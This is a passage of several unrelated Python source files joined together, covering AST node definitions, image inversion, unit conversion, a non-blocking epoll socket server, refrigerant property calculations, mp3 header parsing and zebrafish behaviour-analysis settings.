'ImportFrom': (('module', 'names', 'level',), ('lineno', 'col_offset',),
(stmt,)),
'Exec': (('body', 'globals', 'locals',), ('lineno', 'col_offset',),
(stmt,)),
'Global': (('names',), ('lineno', 'col_offset',),
(stmt,)),
'Nonlocal': (('names',), ('lineno', 'col_offset',),
(stmt,)),
'Expr': (('value',), ('lineno', 'col_offset',),
(stmt,)),
'Pass': ((), ('lineno', 'col_offset',),
(stmt,)),
'Break': ((), ('lineno', 'col_offset',),
(stmt,)),
'Continue': ((), ('lineno', 'col_offset',),
(stmt,)),
# expr
'BoolOp': (('op', 'values',), ('lineno', 'col_offset',),
(expr,)),
'BinOp': (('left', 'op', 'right',), ('lineno', 'col_offset',),
(expr,)),
'UnaryOp': (('op', 'operand',), ('lineno', 'col_offset',),
(expr,)),
'Lambda': (('args', 'body',), ('lineno', 'col_offset',),
(expr,)),
'IfExp': (('test', 'body', 'orelse',), ('lineno', 'col_offset',),
(expr,)),
'Dict': (('keys', 'values',), ('lineno', 'col_offset',),
(expr,)),
'Set': (('elts',), ('lineno', 'col_offset',),
(expr,)),
'ListComp': (('elt', 'generators',), ('lineno', 'col_offset',),
(expr,)),
'SetComp': (('elt', 'generators',), ('lineno', 'col_offset',),
(expr,)),
'DictComp': (('key', 'value', 'generators',), ('lineno', 'col_offset',),
(expr,)),
'GeneratorExp': (('elt', 'generators',), ('lineno', 'col_offset',),
(expr,)),
'Await': (('value',), ('lineno', 'col_offset',),
(expr,)),
'Yield': (('value',), ('lineno', 'col_offset',),
(expr,)),
'YieldFrom': (('value',), ('lineno', 'col_offset',),
(expr,)),
'Compare': (('left', 'ops', 'comparators',), ('lineno', 'col_offset',),
(expr,)),
'Call': (('func', 'args', 'keywords',), ('lineno', 'col_offset',),
(expr,)),
'Repr': (('value',), ('lineno', 'col_offset',),
(expr,)),
'Num': (('n',), ('lineno', 'col_offset',),
(expr,)),
'Str': (('s',), ('lineno', 'col_offset',),
(expr,)),
'FormattedValue': (('value', 'conversion', 'format_spec',),
('lineno', 'col_offset',), (expr,)),
'JoinedStr': (('values',), ('lineno', 'col_offset',), (expr,)),
'Bytes': (('s',), ('lineno', 'col_offset',),
(expr,)),
'NameConstant': (('value',), ('lineno', 'col_offset',),
(expr,)),
'Ellipsis': ((), ('lineno', 'col_offset',),
(expr,)),
'Attribute': (('value', 'attr', 'ctx',), ('lineno', 'col_offset',),
(expr,)),
'Subscript': (('value', 'slice', 'ctx',), ('lineno', 'col_offset',),
(expr,)),
'Starred': (('value', 'ctx',), ('lineno', 'col_offset',),
(expr,)),
'Name': (('id', 'ctx', 'annotation'), ('lineno', 'col_offset',),
(expr,)),
'List': (('elts', 'ctx',), ('lineno', 'col_offset',),
(expr,)),
'Tuple': (('elts', 'ctx',), ('lineno', 'col_offset',),
(expr,)),
# expr_context
'Load': ((), (), (expr_context,)),
'Store': ((), (), (expr_context,)),
'Del': ((), (), (expr_context,)),
'AugLoad': ((), (), (expr_context,)),
'AugStore': ((), (), (expr_context,)),
'Param': ((), (), (expr_context,)),
# slice
'Slice': (('lower', 'upper', 'step'), (), (slice,)),
'ExtSlice': (('dims',), (), (slice,)),
'Index': (('value',), (), (slice,)),
# boolop
'And': ((), (), (boolop,)),
'Or': ((), (), (boolop,)),
# operator
'Add': ((), (), (operator,)),
'Sub': ((), (), (operator,)),
'Mult': ((), (), (operator,)),
'MatMult': ((), (), (operator,)),
'Div': ((), (), (operator,)),
'Mod': ((), (), (operator,)),
'Pow': ((), (), (operator,)),
'LShift': ((), (), (operator,)),
'RShift': ((), (), (operator,)),
'BitOr': ((), (), (operator,)),
'BitXor': ((), (), (operator,)),
'BitAnd': ((), (), (operator,)),
'FloorDiv': ((), (), (operator,)),
# unaryop
'Invert': ((), (), (unaryop, AST,)),
'Not': ((), (), (unaryop, AST,)),
'UAdd': ((), (), (unaryop, AST,)),
'USub': ((), (), (unaryop, AST,)),
# cmpop
'Eq': ((), (), (cmpop,)),
'NotEq': ((), (), (cmpop,)),
'Lt': ((), (), (cmpop,)),
'LtE': ((), (), (cmpop,)),
'Gt': ((), (), (cmpop,)),
'GtE': ((), (), (cmpop,)),
'Is': ((), (), (cmpop,)),
'IsNot': ((), (), (cmpop,)),
'In': ((), (), (cmpop,)),
'NotIn': ((), (), (cmpop,)),
# comprehension
'comprehension': (('target', 'iter', 'ifs', 'is_async'), (), (AST,)),
# excepthandler
'ExceptHandler': (('type', 'name', 'body'), ('lineno', 'col_offset'),
(excepthandler,)),
# arguments
'arguments': (('args', 'vararg', 'kwonlyargs', 'kw_defaults',
'kwarg', 'defaults'), (), (AST,)),
# keyword
'keyword': (('arg', 'value'), (), (AST,)),
# alias
'alias': (('name', 'asname'), (), (AST,)),
# withitem
'withitem': (('context_expr', 'optional_vars'), (), (AST,)),
}
for name, descr in _nodes.items():
_make_node(name, *descr)
if _sys.version_info.major == 2:
from .ast2 import ast_to_gast, gast_to_ast
if _sys.version_info.major == 3:
from .ast3 import ast_to_gast, gast_to_ast
def parse(*args, **kwargs):
return ast_to_gast(_ast.parse(*args, **kwargs))
def literal_eval(node_or_string):
if isinstance(node_or_string, AST):
node_or_string = gast_to_ast(node_or_string)
return _ast.literal_eval(node_or_string)
def get_docstring(node, clean=True):
if not isinstance(node, (FunctionDef, ClassDef, Module)):
raise TypeError("%r can't have docstrings" % node.__class__.__name__)
if node.body and isinstance(node.body[0], Expr) and \
isinstance(node.body[0].value, Str):
if clean:
import inspect
return inspect.cleandoc(node.body[0].value.s)
return node.body[0].value.s
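# Illustrative usage sketch (not part of the original module). Assuming the
# package is importable as `gast`, the wrappers above expose an ast-like API
# that yields the same node classes on Python 2 and Python 3:
#
#   import gast
#   tree = gast.parse("def f():\n    'doc'\n    return 1")
#   print(gast.get_docstring(tree.body[0]))   # -> doc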
|
import cv2
from . import print_image
from . import plot_image
def invert(img, device, debug=None):
"""Inverts grayscale images.
Inputs:
img = image object, grayscale
device = device number. Used to count steps in the pipeline
debug = None, print, or plot. Print = save to file, Plot = print to screen.
Returns:
device = device number
img_inv = inverted image
:param img: numpy array
:param device: int
:param debug: str
:return device: int
:return img_inv: numpy array
"""
device += 1
img_inv = cv2.bitwise_not(img)
if debug == 'print':
print_image(img_inv, (str(device) + '_invert.png'))
elif debug == 'plot':
plot_image(img_inv, cmap='gray')
return device, img_inv
|
def token_encryption_algorithm():
return 'HS256'
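# Illustrative usage sketch (not part of the original module): the string
# returned above matches the algorithm names PyJWT accepts, so a token could
# be signed and checked like this (secret and payload are made up):
#
#   import jwt
#   token = jwt.encode({"user_id": 42}, "secret", algorithm=token_encryption_algorithm())
#   claims = jwt.decode(token, "secret", algorithms=[token_encryption_algorithm()])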
|
import re
import quantities as pq
from numbers import NumberService
class ConversionService(object):
__exponents__ = {
'square': 2,
'squared': 2,
'cubed': 3
}
def _preprocess(self, input):
def handleExponents(input):
m = re.search(r'\bsquare (\w+)', input)
if m and self.isValidUnit(m.group(1)):
input = re.sub(r'\bsquare (\w+)', r'\g<1>^2', input)
m = re.search(r'\bsquared (\w+)', input)
if m and self.isValidUnit(m.group(1)):
input = re.sub(r'\bsquared (\w+)', r'\g<1>^2', input)
m = re.search(r'\b(\w+) squared', input)
if m and self.isValidUnit(m.group(1)):
input = re.sub(r'\b(\w+) squared', r'\g<1>^2', input)
m = re.search(r'\bsq (\w+)', input)
if m and self.isValidUnit(m.group(1)):
input = re.sub(r'\bsq (\w+)', r'\g<1>^2', input)
m = re.search(r'\b(\w+) cubed', input)
if m and self.isValidUnit(m.group(1)):
input = re.sub(r'\b(\w+) cubed', r'\g<1>^3', input)
m = re.search(r'\bcubic (\w+)', input)
if m and self.isValidUnit(m.group(1)):
input = re.sub(r'\bcubic (\w+)', r'\g<1>^3', input)
service = NumberService()
m = re.search(r'\b(\w+) to the (\w+)( power)?', input)
if m and self.isValidUnit(m.group(1)):
if m.group(2) in service.__ordinals__:
exp = service.parseMagnitude(m.group(2))
input = re.sub(r'\b(\w+) to the (\w+)( power)?',
r'\g<1>^' + str(exp), input)
return input
input = re.sub(r'\sper\s', r' / ', input)
input = handleExponents(input)
return input
def parseUnits(self, input):
"""Carries out a conversion (represented as a string) and returns the
result as a human-readable string.
Args:
input (str): Text representing a unit conversion, which should
include a magnitude, a description of the initial units,
and a description of the target units to which the quantity
should be converted.
Returns:
A quantities object representing the converted quantity and its new
units.
"""
quantity = self.convert(input)
units = ' '.join(str(quantity.units).split(' ')[1:])
return NumberService.parseMagnitude(quantity.item()) + " " + units
def isValidUnit(self, w):
"""Checks if a string represents a valid quantities unit.
Args:
w (str): A string to be tested against the set of valid
quantities units.
Returns:
True if the string can be used as a unit in the quantities
module.
"""
bad = set(['point', 'a'])
if w in bad:
return False
try:
pq.Quantity(0.0, w)
return True
except:
return w == '/'
def extractUnits(self, input):
"""Collects all the valid units from an input string. Works by
        appending consecutive words from the string and cross-referencing
them with a set of valid units.
Args:
input (str): Some text which hopefully contains descriptions
of different units.
Returns:
A list of strings, each entry in which is a valid quantities
unit.
"""
input = self._preprocess(input)
units = []
description = ""
for w in input.split(' '):
if self.isValidUnit(w) or w == '/':
if description:
description += " "
description += w
else:
if description:
units.append(description)
description = ""
if description:
units.append(description)
return units
def convert(self, input):
"""Converts a string representation of some quantity of units into a
quantities object.
Args:
input (str): A textual representation of some quantity of units,
e.g., "fifty kilograms".
Returns:
A quantities object representing the described quantity and its
units.
"""
input = self._preprocess(input)
n = NumberService().longestNumber(input)
units = self.extractUnits(input)
# Convert to quantity object, attempt conversion
quantity = pq.Quantity(float(n), units[0])
quantity.units = units[1]
return quantity
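# Illustrative usage sketch (not part of the original module). How well this
# works depends on the accompanying NumberService parsing the spelled-out
# magnitude and on the quantities package recognising both unit names:
#
#   service = ConversionService()
#   quantity = service.convert("fifty kilograms to grams")
#   print(quantity)   # expected to be roughly 50000 g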
|
from functionaltest import FunctionalTest
class Test_2595_Throbber(FunctionalTest):
def test_spinner_appears_during_recalcs(self):
# * Harold likes to know when dirigible is working hard on his calculations
# * He logs in and creates a new sheet
self.login_and_create_new_sheet()
# * When the grid has appeared, the spinner might be visible, but it disappears
# rapidly as the initial empty recalc completes.
self.wait_for_spinner_to_stop()
# * and enters some hard-working user-code
self.append_usercode('import time\ntime.sleep(20)\nworksheet[1,1].value="ready"')
# * He spots the spinner on the page
self.wait_for(self.is_spinner_visible,
lambda : 'spinner not present',
timeout_seconds = 5)
# * When the recalc is done, he sees the spinner go away
self.wait_for_cell_value(1, 1, 'ready', timeout_seconds=25)
self.assertTrue(self.is_element_present('css=#id_spinner_image.hidden'))
|
import select
import socket
from nbNetUtils import DEBUG, dbgPrint
__all__ = ["nbNet"]
class STATE:
def __init__(self):
        self.state = "accept"       # connection state
        self.have_read = 0          # bytes read so far
        self.need_read = 10         # the 10-byte length header is read first
        self.have_write = 0         # bytes written so far
        self.need_write = 0         # bytes still to write
        self.buff_read = ""         # read buffer
        self.buff_write = ""        # write buffer
        self.sock_obj = ""          # socket object
def printState(self):
if DEBUG:
dbgPrint('\n - current state of fd: %d' % self.sock_obj.fileno())
dbgPrint(" - - state: %s" % self.state)
dbgPrint(" - - have_read: %s" % self.have_read)
dbgPrint(" - - need_read: %s" % self.need_read)
dbgPrint(" - - have_write: %s" % self.have_write)
dbgPrint(" - - need_write: %s" % self.need_write)
dbgPrint(" - - buff_read: %s" % self.buff_read)
dbgPrint(" - - buff_write: %s" % self.buff_write)
dbgPrint(" - - sock_obj: %s" % self.sock_obj)
class nbNetBase:
def setFd(self, sock):
dbgPrint("\n setFd start")
        tmp_state = STATE()                          # create a fresh state object
        tmp_state.sock_obj = sock                    # attach the socket to it
        self.conn_state[sock.fileno()] = tmp_state   # index the state by the socket's fd
self.conn_state[sock.fileno()].printState()
dbgPrint("\n setFd end")
def accept(self, fd):
dbgPrint("\n accept start!")
        sock_state = self.conn_state[fd]   # state for this fd
        sock = sock_state.sock_obj         # the listening socket
        conn, addr = sock.accept()         # accept the pending connection
        conn.setblocking(0)                # switch the new connection to non-blocking mode
        return conn                        # return the accepted connection
def close(self, fd):
try:
            sock = self.conn_state[fd].sock_obj   # socket for this fd
            sock.close()                          # close it
        except:
            dbgPrint("Close fd: %s" % fd)
        finally:
            self.epoll_sock.unregister(fd)        # remove the fd from epoll
            self.conn_state.pop(fd)               # drop it from the state dict
def read(self, fd):
try:
            sock_state = self.conn_state[fd]             # state for this fd
            conn = sock_state.sock_obj                   # the connection's socket
            if sock_state.need_read <= 0:                # nothing left to read is an error
                raise socket.error
            one_read = conn.recv(sock_state.need_read)   # read the bytes still expected
            dbgPrint("\n func fd: %d, one_read: %s, need_read: %d" %
                     (fd, one_read, sock_state.need_read))
            if len(one_read) == 0:                       # zero bytes read means the peer closed
                raise socket.error
            sock_state.buff_read += one_read             # append the data to the read buffer
            sock_state.have_read += len(one_read)        # bytes read so far
            sock_state.need_read -= len(one_read)        # bytes still expected
            sock_state.printState()
            if sock_state.have_read == 10:               # the first 10 bytes are the length header
                header_said_need_read = int(sock_state.buff_read)  # the header carries the body length
                if header_said_need_read <= 0:           # a zero-length body is an error
                    raise socket.error
                sock_state.need_read += header_said_need_read  # now expect that many body bytes
                sock_state.buff_read = ''                # clear the buffer before reading the body
                sock_state.printState()
                return "readcontent"                     # body still to be read
            elif sock_state.need_read == 0:
                return "process"                         # message complete, switch to processing
            else:
                return "readmore"                        # keep reading
        except (socket.error, ValueError), msg:
            try:
                if msg.errno == 11:                      # EAGAIN: try the read again later
                    dbgPrint("11 " + str(msg))
                    return "retry"
            except:
                pass
            return "closing"
def write(self, fd):
        sock_state = self.conn_state[fd]         # state for this fd
        conn = sock_state.sock_obj               # the connection's socket
        last_have_send = sock_state.have_write   # bytes already sent
        try:
            have_send = conn.send(
                sock_state.buff_write[last_have_send:])  # send whatever is left
            sock_state.have_write += have_send           # bytes sent so far
            sock_state.need_write -= have_send           # bytes still to send
            if sock_state.need_write == 0 and sock_state.have_write != 0:  # reply fully written
                sock_state.printState()
                dbgPrint("\n write data end")
                return "writecomplete"                   # writing is complete
            else:
                return "writemore"                       # more data still to send
        except socket.error, msg:
            return "closing"
def run(self):
while True:
            epoll_list = self.epoll_sock.poll()       # wait for epoll events
            for fd, events in epoll_list:
                sock_state = self.conn_state[fd]      # state for this fd
                if select.EPOLLHUP & events:          # peer hung up
                    dbgPrint("EPOLLHUP")
                    sock_state.state = "closing"      # mark the fd for closing
                elif select.EPOLLERR & events:        # error on the fd
                    dbgPrint("EPOLLERR")
                    sock_state.state = "closing"      # mark the fd for closing
                self.state_machine(fd)                # dispatch on the current state
    def state_machine(self, fd):
        sock_state = self.conn_state[fd]              # state for this fd
        self.sm[sock_state.state](fd)                 # call the handler registered for the current state
class nbNet(nbNetBase):
def __init__(self, addr, port, logic):
dbgPrint('\n__init__: start!')
        self.conn_state = {}       # per-connection state, keyed by fd
        self.listen_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        self.listen_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.listen_sock.bind((addr, port))
        self.listen_sock.listen(10)                     # listen backlog
        self.setFd(self.listen_sock)                    # register the listening socket in conn_state
        self.epoll_sock = select.epoll()                # create the epoll object
        self.epoll_sock.register(
            self.listen_sock.fileno(), select.EPOLLIN)  # watch the listening fd for reads
        self.logic = logic                              # business-logic callback
        self.sm = {
            "accept": self.accept2read,
            "read": self.read2process,
            "write": self.write2read,
            "process": self.process,
            "closing": self.close,
        }                                               # state-machine dispatch table
        dbgPrint('\n__init__: end, register no: %s' %
                 self.listen_sock.fileno())
def process(self, fd):
sock_state = self.conn_state[fd]
        response = self.logic(sock_state.buff_read)                     # run the business logic
        sock_state.buff_write = "%010d%s" % (len(response), response)  # frame the reply: 10-digit length header + body
        sock_state.need_write = len(sock_state.buff_write)             # total bytes to send
        sock_state.state = "write"                                      # next state is write
        self.epoll_sock.modify(fd, select.EPOLLOUT)                     # switch epoll to write readiness
sock_state.printState()
def accept2read(self, fd):
conn = self.accept(fd)
self.epoll_sock.register(
            conn.fileno(), select.EPOLLIN)             # register the new connection for read events
        self.setFd(conn)                               # create its state object
        self.conn_state[conn.fileno()].state = "read"  # the new connection starts in the read state
dbgPrint("\n -- accept end!")
def read2process(self, fd):
read_ret = ""
        # state transition
        try:
            read_ret = self.read(fd)                 # result reported by read()
        except (Exception), msg:
            dbgPrint(msg)
            read_ret = "closing"
        if read_ret == "process":                    # message complete, move on to process
            self.process(fd)
        elif read_ret == "readcontent":              # readcontent / readmore / retry: keep reading
            pass
        elif read_ret == "readmore":
            pass
        elif read_ret == "retry":
            pass
        elif read_ret == "closing":
            self.conn_state[fd].state = 'closing'    # close the connection
self.state_machine(fd)
else:
raise Exception("impossible state returned by self.read")
def write2read(self, fd):
try:
            write_ret = self.write(fd)              # result reported by write()
        except socket.error, msg:                   # close the connection on error
            write_ret = "closing"
        if write_ret == "writemore":                # keep writing
            pass
        elif write_ret == "writecomplete":          # reply fully written
            sock_state = self.conn_state[fd]
            conn = sock_state.sock_obj
            self.setFd(conn)                        # reset the connection's state object
            self.conn_state[fd].state = "read"      # back to the read state
            self.epoll_sock.modify(fd, select.EPOLLIN)  # watch for reads again
        elif write_ret == "closing":                # an error occurred, close the connection
            dbgPrint("write closing fd: %s" % fd)
            self.conn_state[fd].state = 'closing'
self.state_machine(fd)
if __name__ == '__main__':
def logic(d_in):
return(d_in[::-1])
reverseD = nbNet('0.0.0.0', 9060, logic)
reverseD.run()
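# Client sketch (illustrative, not part of the original file): every message
# is framed as a 10-character, zero-padded ASCII length header followed by
# that many payload bytes, and the server replies in the same framing (see
# process() above). A matching blocking client could look like:
#
#   import socket
#   s = socket.create_connection(('127.0.0.1', 9060))
#   payload = "hello"
#   s.sendall("%010d%s" % (len(payload), payload))
#   header = s.recv(10)
#   body = s.recv(int(header))
#   print body   # "olleh" for the reverse logic() above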
|
'''
Created on 20 Sep 2013
@author: jowr
'''
from pyrp.refpropClasses import RefpropSI
import CoolProp.CoolProp as cp
p = 30000
T = 273.15
ref = False
if ref:
xkg = [0.473194694453358, 0.205109095413331, 0.321696210133311]
names = "R32|R125|R134a"
RP = RefpropSI()
RP.SETUPFLEX(xkg=xkg, FluidNames=names)
T_A, p_A, D_A, Dl_A, Dv_A, q_A, e_A, h_A, s_A, cv_A, cp_A, w_A = RP.PQFLSH(p, 0)
T_B, p_B, D_B, Dl_B, Dv_B, q_B, e_B, h_B, s_B, cv_B, cp_B, w_B = RP.PQFLSH(p, 1)
T_C, p_C, D_C, Dl_C, Dv_C, q_C, e_C, h_C, s_C, cv_C, cp_C, w_C = RP.TQFLSH(T, 0)
hlb = h_A / 1000.
hrb = h_B / 1000.
h200 = h_C / 1000.
print("Refprop: %s %s %s" % (hlb, hrb, h200))
else:
R407F = 'REFPROP-MIX:R32[0.473194694453358]&R125[0.205109095413331]&R134a[0.321696210133311]'
# R407F='REFPROP-MIX:R32[0.651669604033581]&R125[0.122438378639971]&R134a[0.225892017326446]'
hlb = cp.Props('H', 'P', 30, 'Q', 0, R407F) # 30 kPa saturated liquid
hrb = cp.Props('H', 'P', 30, 'Q', 1, R407F) # 30 kPa saturated vapour
h200 = cp.Props('H', 'T', 273.15, 'Q', 0, R407F) # saturated liquid at 0C IIR
print("CoolProp: %s %s %s" % (hlb, hrb, h200))
|
""" mp3.py
Reads information from an mp3 file.
This is a python port of code taken from the mpg123 input module of xmms.
"""
import struct
def header(buf):
return struct.unpack(">I",buf)[0]
def head_check(head):
if ((head & 0xffe00000L) != 0xffe00000L):
return 0
if (not ((head >> 17) & 3)):
return 0
if (((head >> 12) & 0xf) == 0xf):
return 0
if ( not ((head >> 12) & 0xf)):
return 0
if (((head >> 10) & 0x3) == 0x3):
return 0
if (((head >> 19) & 1) == 1 and ((head >> 17) & 3) == 3 and ((head >> 16) & 1) == 1):
return 0
if ((head & 0xffff0000L) == 0xfffe0000L):
return 0
return 1
def filesize(file):
""" Returns the size of file sans any ID3 tag
"""
f=open(file)
f.seek(0,2)
size=f.tell()
try:
f.seek(-128,2)
except:
f.close()
return 0
buf=f.read(3)
f.close()
if buf=="TAG":
size=size-128
if size<0:
return 0
else:
return size
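# Bitrate lookup table in kbit/s, indexed as table[lsf][layer - 1][bitrate_index]:
# the first block is MPEG 1 (Layers I, II, III), the second is MPEG 2/2.5.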
table=[[
[0, 32, 64, 96, 128, 160, 192, 224, 256, 288, 320, 352, 384, 416, 448],
[0, 32, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320, 384],
[0, 32, 40, 48, 56, 64, 80, 96, 112, 128, 160, 192, 224, 256, 320]],
[
[0, 32, 48, 56, 64, 80, 96, 112, 128, 144, 160, 176, 192, 224, 256],
[0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160],
[0, 8, 16, 24, 32, 40, 48, 56, 64, 80, 96, 112, 128, 144, 160]]]
def decode_header(head):
""" Decode the mp3 header and put the information in a frame structure
"""
freqs=[44100, 48000, 32000, 22050, 24000, 16000, 11025, 12000, 8000]
fr={}
if head & (1 << 20):
if head & (1 << 19):
fr["lsf"]=0
else:
fr["lsf"]=1
fr["mpeg25"] = 0
else:
fr["lsf"] = 1
fr["mpeg25"] = 1
fr["lay"] = 4 - ((head >> 17) & 3)
if fr["mpeg25"]:
fr["sampling_frequency"] = freqs[6 + ((head >> 10) & 0x3)]
else:
fr["sampling_frequency"] = freqs[((head >> 10) & 0x3) + (fr["lsf"] * 3)]
fr["error_protection"] = ((head >> 16) & 0x1) ^ 0x1
fr["bitrate_index"] = ((head >> 12) & 0xf)
fr["bitrate"]=table[fr["lsf"]][fr["lay"]-1][fr["bitrate_index"]]
fr["padding"]=((head>>9) & 0x1)
fr["channel_mode"]=((head>>6) & 0x3)
if fr["lay"]==1:
fr["framesize"]=table[fr["lsf"]][0][fr["bitrate_index"]]*12000
fr["framesize"]=fr["framesize"]/fr["sampling_frequency"]
fr["framesize"]=((fr["framesize"]+fr["padding"])<<2)-4
elif fr["lay"]==2:
fr["framesize"]=table[fr["lsf"]][1][fr["bitrate_index"]]*144000
fr["framesize"]=fr["framesize"]/fr["sampling_frequency"]
fr["framesize"]=fr["framesize"]+fr["padding"]-1
elif fr["lay"]==3:
fr["framesize"]=table[fr["lsf"]][2][fr["bitrate_index"]]*144000
fr["framesize"]=fr["framesize"]/fr["sampling_frequency"]<<fr["lsf"]
fr["framesize"]=fr["framesize"]+fr["padding"]-4
pass
else:
return 0
return fr
def decode_vbr(buf):
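    # A "Xing" header in the first frame marks a VBR file. Bytes 4-7 hold a
    # big-endian flags word; bit 0 of the low byte says a 32-bit frame count
    # follows at offset 8, which is what the duration estimate below relies on.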
vbr = {}
if buf[:4] != "Xing":
return 0
frames_flag = ord(buf[7]) & 1
if not frames_flag:
return 0
vbr["frames"] = header(buf[8:])
return vbr
def decode_synch_integer(buf):
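    # ID3v2 stores the tag size as four "synchsafe" bytes: only the low 7 bits
    # of each byte are significant, so the bytes are concatenated 7 bits at a time.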
return (ord(buf[0])<<21)+(ord(buf[1])<<14)+(ord(buf[2])<<7)+ord(buf[3])
def detect_mp3(filename):
""" Determines whether this is an mp3 file and if so reads information
from it.
"""
try:
f=open(filename,"rb")
except:
return 0
try:
tmp=f.read(4)
except:
f.close()
return 0
if tmp[:3] == 'ID3':
try:
tmp = f.read(6)
f.seek(decode_synch_integer(tmp[2:])+10)
tmp=f.read(4)
except:
f.close()
return 0
try:
head=header(tmp)
except:
return 0
while not head_check(head):
# This is a real time waster, but an mp3 stream can start anywhere
# in a file so we have to search the entire file which can take a
# while for large non-mp3 files.
try:
buf=f.read(1024)
except:
f.close()
return 0
if buf=="":
f.close()
return 0
for i in range(0,len(buf)-1):
head=long(head)<<8;
head=head|ord(buf[i])
if head_check(head):
f.seek(i+1-len(buf),1)
break
mhead=decode_header(head)
if mhead:
# Decode VBR header if there's any.
pos = f.tell()
mhead["vbr"] = 0
if not mhead["lsf"]:
if mhead["channel_mode"] == 3:
vbrpos = 17
else:
vbrpos = 32
else:
if mhead["channel_mode"] == 3:
vbrpos = 9
else:
vbrpos = 17
try:
f.seek(vbrpos,1)
vbr = decode_vbr(f.read(12))
mhead["vbrframes"] = vbr["frames"]
if mhead["vbrframes"] >0:
mhead["vbr"] = 1
except:
pass
# We found something which looks like a MPEG-header
# We check the next frame too, to be sure
if f.seek(pos+mhead["framesize"]):
f.close()
return 0
try:
tmp=f.read(4)
except:
f.close()
return 0
if len(tmp)!=4:
f.close()
return 0
htmp=header(tmp)
if not (head_check(htmp) and decode_header(htmp)):
f.close()
return 0
f.close()
    # If we have found a valid mp3, add some more info to the head data.
if mhead:
mhead["filesize"]=filesize(filename)
if not mhead["vbr"]:
if mhead["bitrate"] and mhead["filesize"]:
mhead["time"]=int(float(mhead["filesize"])/(mhead["bitrate"]*1000)*8)
else:
mhead["time"]=0
else:
if mhead["filesize"] and mhead["sampling_frequency"]:
medframesize = float(mhead["filesize"])/float(mhead["vbrframes"])
if mhead["lsf"]:
coef = 12
else:
coef = 144
vbrrate = medframesize*mhead["sampling_frequency"]/(1000*coef)
mhead["time"]=int(float(mhead["filesize"])/(vbrrate*1000)*8)
mhead["vbrrate"] = int(vbrrate)
return mhead
else:
return 0
if __name__=="__main__":
import sys
mp3info=detect_mp3(sys.argv[1])
if mp3info:
print mp3info
else:
print "Not an mp3 file."
|
def listDeal(items):
    listString = ''
    for i in range(0, len(items)):
        if i != (len(items) - 1):
            listString += items[i] + ','
        else:
            listString += 'and ' + items[i]
print(listString)
spam = ['apples','bananas','tofu','cats']
listDeal(spam)
|
import os,sys,glob,re
import numpy as np
import scipy
from scipy import stats
import datetime
import time
from datetime import timedelta
from scipy.stats.kde import gaussian_kde
from numpy import linspace
from scipy.stats import kruskal
import pandas as pd
import statsmodels.api as sm
from scipy.stats import mstats
nonstimcombos = {"Frequency of movement": ["numberofbouts_min", "numberofbouts_10min", "dpixnumberofbouts_min", "dpixnumberofbouts_10min", "aveinterboutinterval_min", "aveinterboutinterval_10min", "avedpixinterboutinterval_min", "avedpixinterboutinterval_10min", "dpixsecper_min", "dpixminper_10min", "distsecper_min", "distminper_10min"], "Location in well": ["interboutcenterfrac_min", "interboutaverhofrac_min", "centerfrac_min", "averhofrac_min","interboutcenterfrac_10min", "interboutaverhofrac_10min", "centerfrac_10min", "averhofrac_10min"], "Features of movement": ["dpixavebouttime_min", "dpixavebouttime_10min", "aveboutvel_min", "aveboutvel_10min", "avebouttime_min", "avebouttime_10min", "aveboutspeed_min", "aveboutspeed_10min", "aveboutdist_min", "aveboutdist_10min", "aveboutdisp_min", "aveboutdisp_10min", "aveboutcumdpix_min", "aveboutcumdpix_10min"]}
typecombos = [["Night tap habituation", "Day tap habituation 1", "Day tap habituation 2", "Day tap habituation 3"], ["Day light flash", "Night light flash"],["Night early prepulse tap", "Day early prepulse tap"], ["Night all prepulse tap", "Day all prepulse tap"], ["Day all strong tap", "Night all strong tap"], ["Day early strong tap","Night early strong tap"],["Night early weak tap", "Day early weak tap"], ["Day all weak tap", "Night all weak tap"], ["Dark flash block 3 start","Dark flash block 3 end","Dark flash block 4 start","Dark flash block 4 end","Dark flash block 1 start","Dark flash block 1 end","Dark flash block 2 start","Dark flash block 2 end"]]
stimcombos = {
#"Day light flash and weak tap": ["106106"],
#"Night light flash and weak tap": ["night106106"],
"Night tap habituation": ["nighttaphab102", "nighttaphab1"],
"Day tap habituation 1": ["adaytaphab102", "adaytaphab1"],
"Day tap habituation 3": ["cdaytaphab102", "cdaytaphab1"],
"Day tap habituation 2": ["bdaytaphab102", "bdaytaphab1"],
"Day light flash": ["lightflash104"],
#"Day light flash": ["lightflash104", "lightflash0"],
"Night light flash": ["nightlightflash104"],
#"Night light flash": ["nightlightflash104", "nightlightflash0"],
"Night early prepulse tap": ["shortnightprepulseinhibition100b"],
#"Night early prepulse tap": ["shortnightprepulseinhibition100b", "shortnightprepulseinhibition100c"],
"Night all prepulse tap": ["nightprepulseinhibition100b"],
#"Night all prepulse tap": ["nightprepulseinhibition100b", "nightprepulseinhibition100c"],
"Day early prepulse tap": ["shortdayprepulseinhibition100b"],
#"Day early prepulse tap": ["shortdayprepulseinhibition100b", "shortdayprepulseinhibition100c"],
"Day all prepulse tap": ["dayprepulseinhibition100b"],
#"Day all prepulse tap": ["dayprepulseinhibition100b", "dayprepulseinhibition100c"],
"Day all weak tap": ["dayprepulseinhibition100a", "dayprepulseinhibition101"],
"Day early weak tap": ["shortdayprepulseinhibition100a", "shortdayprepulseinhibition101"],
"Night all weak tap": ["nightprepulseinhibition100a", "nightprepulseinhibition101"],
"Night early weak tap": ["shortnightprepulseinhibition100a", "shortnightprepulseinhibition101"],
"Day early strong tap": ["adaytappre102", "shortdayprepulseinhibition102"],
#"Day early strong tap": ["adaytappre102", "adaytappre1", "shortdayprepulseinhibition102"],
"Day all strong tap": ["dayprepulseinhibition102", "adaytappostbdaytappre102","bdaytappostcdaytappre102", "cdaytappost102"],
#"Day all strong tap": ["dayprepulseinhibition102", "adaytappostbdaytappre102","bdaytappostcdaytappre102", "bdaytappostcdaytappre1", "cdaytappost1", "cdaytappost102","adaytappostbdaytappre1"],
"Night early strong tap": ["nighttappre102"],
#"Night early strong tap": ["nighttappre1", "nighttappre102"],
"Night all strong tap": ["nightprepulseinhibition102","nighttappost102"],
#"Night all strong tap": ["nightprepulseinhibition102","nighttappost102", "nighttappost1"],
#"Dark flash all blocks": ["darkflash103", "darkflash0"],
"Dark flash block 3 start": ["cdarkflash103"],
"Dark flash block 3 end": ["c2darkflash103"],
"Dark flash block 1 start": ["adarkflash103"],
"Dark flash block 1 end": ["a2darkflash103"],
"Dark flash block 2 start": ["bdarkflash103"],
